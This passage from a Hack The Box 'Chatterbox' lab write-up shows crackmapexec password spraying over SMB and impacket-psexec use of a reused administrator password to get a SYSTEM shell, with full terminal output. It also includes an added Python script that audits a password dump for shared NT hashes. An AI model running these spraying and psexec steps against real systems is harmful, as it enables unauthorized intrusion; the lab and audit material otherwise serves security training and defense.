Password Reuse


┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ crackmapexec smb $IP -u users -p 'Welcome1!' --continue-on-success
smb         10.10.10.74     445    chatterbox       [*] windows 7 professional 7601 service pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
smb         10.10.10.74     445    chatterbox       [+] chatterbox\alfred:Welcome1! 
smb         10.10.10.74     445    chatterbox       [+] chatterbox\administrator:Welcome1! (Pwn3d!)

During the post-enumeration phase, I extracted the cleartext password for the alfred user. I was checking through SMB exploitations and came across this.

It turns out that the alfred user is the administrator user. This explains how the alfred user has FULL control over the home directory of the administrator user.
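From the defender's side, this finding can be caught before an attacker does by auditing the local account database for shared passwords: NT hashes are unsalted, so two accounts with the same hash have the same password. The following is an added example, not part of the original write-up; the pwdump-style input, the hash values and the `svc_backup` account are constructed placeholders.

```python
from collections import defaultdict

# Constructed pwdump-style lines (user:rid:lmhash:nthash:::). The hash values
# are made-up placeholders, not taken from the Chatterbox host.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Alfred:1001:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
BUILTIN_ADMIN_RID = 500


def parse_dump(text):
    """Yield (user, rid, nt_hash) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit() or len(parts[3]) != 32:
            continue
        yield parts[0], int(parts[1]), parts[3].lower()


def find_reuse(text):
    """Return one finding per NT hash shared by two or more accounts."""
    by_hash = defaultdict(list)
    for user, rid, nt in parse_dump(text):
        if nt != EMPTY_NT:  # blank passwords are a separate finding
            by_hash[nt].append((user, rid))
    findings = []
    for accounts in by_hash.values():
        if len(accounts) < 2:
            continue
        findings.append({
            "accounts": sorted(u for u, _ in accounts),
            # Critical when the built-in Administrator (RID 500) is in the
            # group: any member's password then unlocks that account too.
            "severity": "critical"
            if any(r == BUILTIN_ADMIN_RID for _, r in accounts) else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_reuse(SAMPLE_DUMP):
        print(f["severity"], "shared password:", ", ".join(f["accounts"]))
```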

┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ impacket-psexec 'administrator:Welcome1!@$IP' -target-ip $IP                                                                       
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file eNSosfMg.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service WZal on 10.10.10.74.....
[*] Starting service WZal.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
Chatterbox
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection 4:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.74
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{111d2ff5-ef2c-4d77-b44c-dbce3aaabf4b}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

System Level Compromise